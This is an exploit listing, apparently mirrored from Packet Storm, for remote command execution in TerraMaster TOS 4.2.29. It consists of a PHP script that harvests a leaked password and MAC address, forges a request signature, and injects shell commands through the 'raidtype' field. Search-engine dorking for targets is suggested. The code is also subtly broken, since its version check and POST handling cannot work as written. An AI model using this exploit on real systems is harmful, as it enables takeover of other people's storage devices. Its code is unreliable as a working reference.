## https://sploitus.com/exploit?id=PACKETSTORM:182158
=============================================================================================================================================  
| # Title : TerraMaster TOS 4.2.29 Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.terra-master.com/global/alltos/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking in Google or other search engines.  
  
[+] Uses cURL to issue the remote command.  
  
[+] Line 138: set your target.  
  
[+] Save the code as poc.php.  
  
[+] Usage: cmd => c:\www\test\php poc.php  
  
[+] PayLoad :  
  
<?php  
  
/**
 * PoC client for the TerraMaster TOS code-injection issue described in the
 * advisory header above.
 *
 * Flow, as wired in exploit(): getData() calls `module/api.php?mobile/webNasIPS`,
 * pulls a password and a MAC address out of the JSON `data` field, and derives a
 * signature as md5(key . unix timestamp) where key is six characters of the MAC.
 * executeCommand() then POSTs to `module/api.php?mobile/createRaid` with the
 * `raidtype` field set to `;` followed by the command string. Both API calls
 * pass a 'User-Agent' => 'TNAS' entry to sendRequest().
 *
 * Reviewer notes (defensive):
 *  - Observable artefacts of this PoC: requests to the two `module/api.php?mobile/...`
 *    endpoints named above, a `TNAS` user-agent value, and a `raidtype` form field
 *    whose value begins with `;`.
 *  - check() only considers TOS versions up to 4.2.29 in scope; newer versions are
 *    reported as Safe by this script (see check() for the exact condition).
 */
class TerraMasterExploit
{
// Base URL of the appliance, normalised by the constructor to end with '/'.
private $targetUri;
// Values harvested by getData(): password, mac, key, timestamp, signature.
private $data = [];
// Fingerprint filled by getTerramasterInfo(): cpu_arch, tos_version.
private $terramaster = [];

/**
 * @param string $targetUri Base URL of the appliance; any trailing slashes are
 *                          collapsed to exactly one.
 */
public function __construct($targetUri)
{
$this->targetUri = rtrim($targetUri, '/') . '/';
}

/**
 * Populates $this->data from the `mobile/webNasIPS` response.
 *
 * Nothing is stored unless the response contains 'webNasIPS successful' and a
 * non-empty JSON `data` field. The password is the text between 'PWD:' and
 * 'SAT'; the MAC is the text between 'mac":"' and the next '"'. If either
 * marker is missing, the [1] index below is undefined and PHP emits warnings
 * rather than a clean failure.
 */
public function getData()
{
// Get the data by exploiting the LFI vulnerability through vulnerable endpoint `api.php?mobile/webNasIPS`
$response = $this->sendRequest('POST', 'module/api.php?mobile/webNasIPS', ['User-Agent' => 'TNAS']);

if ($response && strpos($response, 'webNasIPS successful') !== false) {
// Parse the JSON response and get the data
$resJson = json_decode($response, true);
if (!empty($resJson['data'])) {
$this->data['password'] = trim(explode('SAT', explode('PWD:', $resJson['data'])[1])[0]);
$this->data['mac'] = trim(explode('"', explode('mac":"', $resJson['data'])[1])[0]);
// Characters 6..11 of the MAC string (the last three octets of a 12-character MAC).
$this->data['key'] = substr($this->data['mac'], 6, 6); // last three MAC address entries
$this->data['timestamp'] = time();
// derive signature: md5(key . timestamp), see tosEncryptStr()
$this->data['signature'] = $this->tosEncryptStr($this->data['key'], $this->data['timestamp']);
}
}
}

/**
 * Returns md5($key . $strToEncrypt). Despite the name this is a plain hash,
 * not encryption; it mirrors the signature scheme the PoC expects the
 * appliance to accept.
 *
 * @param string     $key
 * @param string|int $strToEncrypt Concatenated to $key; the caller passes a unix timestamp.
 * @return string 32-character hex digest.
 */
private function tosEncryptStr($key, $strToEncrypt)
{
$id = $key . $strToEncrypt;
return md5($id);
}

/**
 * Sends the command to `mobile/createRaid`, prefixed with ';' in the
 * `raidtype` field, along with the Authorization/Signature/Timestamp values
 * collected by getData(). The HTTP response is discarded; there is no return
 * value and no success check.
 *
 * @param string $cmd Command text sent verbatim after the leading ';'.
 */
public function executeCommand($cmd)
{
// Execute RCE using vulnerable endpoint `api.php?mobile/createRaid`
// diskstring is a random 4-8 letter name; it only needs to be a plausible value.
$diskstring = $this->generateRandomString(4, 8);

$headers = [
'User-Agent' => 'TNAS',
'Authorization' => $this->data['password'],
'Signature' => $this->data['signature'],
'Timestamp' => $this->data['timestamp']
];

$this->sendRequest('POST', 'module/api.php?mobile/createRaid', [
'raidtype' => ';' . $cmd,
'diskstring' => $diskstring
], $headers);
}

/**
 * Fingerprints the appliance from the login page (`tos/index.php?user/login`).
 *
 * Fills $this->terramaster['cpu_arch'] and ['tos_version'] only when the page
 * contains a `ver=...` attribute; otherwise the array stays empty, which
 * check() reports as 'Safe'.
 */
public function getTerramasterInfo()
{
// get Terramaster CPU architecture and TOS version
$response = $this->sendRequest('GET', 'tos/index.php?user/login');

if ($response) {
// Shortest match from 'ver=' up to and including the next double quote.
preg_match('/ver=.+?"/', $response, $matches);
if ($matches) {
$version = $matches[0];
// check if architecture is ARM64 or X64
// Mapping used by this PoC: '_A' -> ARM64, '_S' or '_Q' -> X64, anything else UNKNOWN.
if (strpos($version, '_A') !== false) {
$this->terramaster['cpu_arch'] = 'ARM64';
} elseif (strpos($version, '_S') !== false || strpos($version, '_Q') !== false) {
$this->terramaster['cpu_arch'] = 'X64';
} else {
$this->terramaster['cpu_arch'] = 'UNKNOWN';
}

// strip TOS version number and remove trailing double quote.
// Everything after the '.0_' marker is taken as the version string.
$this->terramaster['tos_version'] = rtrim(substr($version, strpos($version, '.0_') + 3), '"');
}
}
}

/**
 * Fingerprints the appliance and returns a human-readable verdict.
 *
 * Returns the bare string 'Safe' when getTerramasterInfo() found nothing.
 * Otherwise returns a string prefixed with 'Vulnerable: ' or 'Safe: ' that
 * embeds tos_version and cpu_arch; which prefix is used depends on the
 * version_compare() condition below against '4.2.29'. The file-level caller
 * keys on the word 'Vulnerable' in this string.
 *
 * @return string
 */
public function check()
{
$this->getTerramasterInfo();
if (empty($this->terramaster)) {
return 'Safe';
}

// Version comparison against 4.2.29 decides which message is returned.
if (version_compare($this->terramaster['tos_version'], '4.2.29', '<=') === 0) {
return "Vulnerable: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";
}

return "Safe: TOS version is {$this->terramaster['tos_version']} and CPU architecture is {$this->terramaster['cpu_arch']}.";
}

/**
 * Runs getData() and then a single hard-coded 'whoami' via executeCommand().
 *
 * @throws Exception when getData() stored nothing (empty $this->data).
 */
public function exploit()
{
$this->getData();
if (empty($this->data)) {
throw new Exception('Cannot retrieve the leaked data.');
}

echo "Executing exploit...\n";
// Example command to execute
$this->executeCommand('whoami'); // Replace 'whoami' with desired command
}

/**
 * Sends one HTTP request with curl and returns the raw response body.
 *
 * @param string $method  HTTP verb; upper-cased before use.
 * @param string $uri     Path appended to the base URL.
 * @param array  $data    Form fields; for POST they become the url-encoded body.
 * @param array  $headers Entries merged after the fixed Content-Type header.
 * @return string|false   curl_exec() result: body on success (CURLOPT_RETURNTRANSFER), false on failure.
 */
private function sendRequest($method, $uri, $data = [], $headers = [])
{
$url = $this->targetUri . $uri;
$options = [
CURLOPT_RETURNTRANSFER => true,
CURLOPT_CUSTOMREQUEST => strtoupper($method),
CURLOPT_HTTPHEADER => array_merge(['Content-Type: application/x-www-form-urlencoded'], $headers)
];

if (strtoupper($method) === 'POST') {
$options[CURLOPT_POSTFIELDS] = http_build_query($data);
} else {
$options[CURLOPT_URL] = $url;
}

$ch = curl_init();
curl_setopt_array($ch, $options);
$response = curl_exec($ch);
curl_close($ch);

return $response;
}

/**
 * Returns between $minLength and $maxLength random uppercase ASCII letters.
 *
 * Uses rand(), which is not a CSPRNG; acceptable here only because the value
 * is a throwaway disk name, not a secret.
 *
 * @param int $minLength
 * @param int $maxLength
 * @return string
 */
private function generateRandomString($minLength, $maxLength)
{
$length = rand($minLength, $maxLength);
return substr(str_shuffle(str_repeat("ABCDEFGHIJKLMNOPQRSTUVWXYZ", $maxLength)), 0, $length);
}
}
  
// Usage  
// Base URL of the appliance under test (placeholder value).
$exploit = new TerraMasterExploit('http://target-terramaster-url.com');
// check() returns a verdict string, printed verbatim.
$check = $exploit->check();
echo $check . "\n";

// exploit() is only reached when the verdict text contains 'Vulnerable';
// it throws an Exception if getData() collected nothing.
if (strpos($check, 'Vulnerable') !== false) {
$exploit->exploit();
}
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================